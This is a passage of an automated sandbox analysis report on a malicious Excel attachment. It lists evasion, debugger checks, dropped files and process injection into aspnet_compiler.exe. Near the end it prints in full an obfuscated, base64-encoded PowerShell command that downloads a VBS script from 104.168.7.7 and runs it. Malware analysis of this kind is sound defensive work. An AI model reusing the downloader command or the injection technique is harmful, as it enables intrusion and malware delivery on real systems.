Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: PI#0034250924.xla.xlsx	Stream path 'Workbook' entropy: 7.99943505066 (max. 8.0)
Source: F7A30000.0.dr	Stream path 'Workbook' entropy: 7.99950221018 (max. 8.0)

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Memory allocated: 840000 memory reserve \| memory write watch			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Memory allocated: DB0000 memory reserve \| memory write watch			Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 13_2_00AB0101 rdtsc

13_2_00AB0101

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7663			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2301			Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ao24xfvf\ao24xfvf.dll

Jump to dropped file

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\mshta.exe TID: 3516	Thread sleep time: -360000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3672	Thread sleep count: 7663 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3672	Thread sleep count: 2301 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3732	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3740	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\wscript.exe TID: 3908	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe TID: 3932	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 3952	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: wscript.exe, 0000000B.00000003.522871057.0000000004E0C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: +noEcIeL7CjzPCdmIrhnPl7Zk6qLp23vyltQcgjA0q1C3w5Ni&&&Z...uxePsphgfshM&&&M4UsM
Source: wscript.exe, 0000000B.00000003.525565103.00000000050AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.526234497.00000000050D4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: RuxePsphgfshM&&&M4UsMV2mvZbaP0haIE&&&XUIpK
Source: wscript.exe, 0000000B.00000003.517908528.0000000005029000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 0q1C3w5Ni&&&Z...uxePsphgfshM&&&M4UsM;;;2mvZbaP0haIE&&&XUIpK...c6r))Utk5SPicnOErW...turhvQe1X2ZlNF
Source: wscript.exe, 0000000B.00000003.519965537.0000000004CB1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Rgns2riR&&&c8bm8hA871r;;;NeMO9uohdR/s;;;2mpCQ7wpEIQzlI...DNS;;;e0Alla+miarL;;;ZCetr6q...Hj9LKAWllOqRdlm//rZOZPfkKo/bZpz9LM;;;+noEcIeL7CjzPCdmIrhnPl7Zk6qLp23vyltQcgjA0q1C3w5Ni&&&Z...uxePsphgfshM&&&M4UsM;;;2mvZbaP0haIE&&&XUIpK...c6rQi'q_
Source: wscript.exe, 0000000B.00000003.521981172.0000000004DAB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.521688290.0000000004D9A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.522157521.0000000004DAD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.519965537.0000000004CB1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Rgns2riR&&&c8bm8hA871r;;;NeMO9uohdR/s;;;2mpCQ7wpEIQzlI...DNS;;;e0Alla+miarL;;;ZCetr6q...Hj9LKAWllOqRdlm//rZOZPfkKo/bZpz9LM;;;+noEcIeL7CjzPCdmIrhnPl7Zk6qLp23vyltQcgjA0q1C3w5Ni&&&Z...uxePsphgfshM&&&M4UsM;;;2mvZbaP0haIE&&&XUIpK...c6r
Source: wscript.exe, 0000000B.00000003.528495125.0000000000339000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ]RuxePsphgfshM&&&M4UsMV2mvZbaP0haIE&&&XUIpK
Source: wscript.exe, 0000000B.00000003.523365177.000000000502A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.523513557.0000000005049000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.523199784.000000000502A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: +noEcIeL7CjzPCdmIrhnPl7Zk6qLp23vyltQcgjA0q1C3w5Ni&&&Z...uxePsphgfshM&&&M4UsM:*'q_

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Checks if the current process is being debugged

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Process queried: DebugPort

Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 13_2_00AB0101 rdtsc

13_2_00AB0101

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 13_2_00A607AC NtCreateMutant,LdrInitializeThunk,

13_2_00A607AC

Contains functionality to read the PEB

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A50080 mov ecx, dword ptr fs:[00000030h]	13_2_00A50080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A500EA mov eax, dword ptr fs:[00000030h]	13_2_00A500EA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A726F8 mov eax, dword ptr fs:[00000030h]	13_2_00A726F8

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\System32\wscript.exe

File created: temp_exec.exe.11.dr

Jump to dropped file

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 7EFDE008	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOWeRSHelL.eXE -ex ByPASs -NoP -W 1 -C DEvICEcREdenTialDEPlOymenT ; Iex($(iEX('[sYsTEM.TexT.EnCODiNg]'+[ChAR]0x3A+[cHAr]58+'UtF8.gETstRING([SySTem.COnVERT]'+[chAR]0X3A+[cHAR]58+'FROMBase64StrinG('+[chAr]34+'JGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYkVyZEVmSW5pdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZanNPcXBMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdKclV3aSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3ZLcGpXbFBZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBGalB6KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieXJabWN4d09YbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRkpNd0h4ZUdIICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRiOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA0LjE2OC43LjcvMzU2L0lFbmV0Ym9va3VwZGF0aW9uLnZicyIsIiRlTnY6QVBQREFUQVxFbmV0Ym9va3VwZGF0aW9uLnZicyIsMCwwKTtzVGFSVC1TTGVFcCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcRW5ldGJvb2t1cGRhdGlvbi52YnMi'+[ChAr]34+'))')))"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRSHelL.eXE -ex ByPASs -NoP -W 1 -C DEvICEcREdenTialDEPlOymenT ; Iex($(iEX('[sYsTEM.TexT.EnCODiNg]'+[ChAR]0x3A+[cHAr]58+'UtF8.gETstRING([SySTem.COnVERT]'+[chAR]0X3A+[cHAR]58+'FROMBase64StrinG('+[chAr]34+'JGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYkVyZEVmSW5pdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZanNPcXBMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdKclV3aSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3ZLcGpXbFBZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBGalB6KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieXJabWN4d09YbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRkpNd0h4ZUdIICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRiOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA0LjE2OC43LjcvMzU2L0lFbmV0Ym9va3VwZGF0aW9uLnZicyIsIiRlTnY6QVBQREFUQVxFbmV0Ym9va3VwZGF0aW9uLnZicyIsMCwwKTtzVGFSVC1TTGVFcCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcRW5ldGJvb2t1cGRhdGlvbi52YnMi'+[ChAr]34+'))')))"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ao24xfvf\ao24xfvf.cmdline"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Enetbookupdation.vbs"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB8B5.tmp" "c:\Users\user\AppData\Local\Temp\ao24xfvf\CSC75A1BB69F3FE4BED81ABA0ECFBA99BE.TMP"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\temp_exec.exe "C:\Users\user\AppData\Local\Temp\temp_exec.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"	Jump to behavior

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; 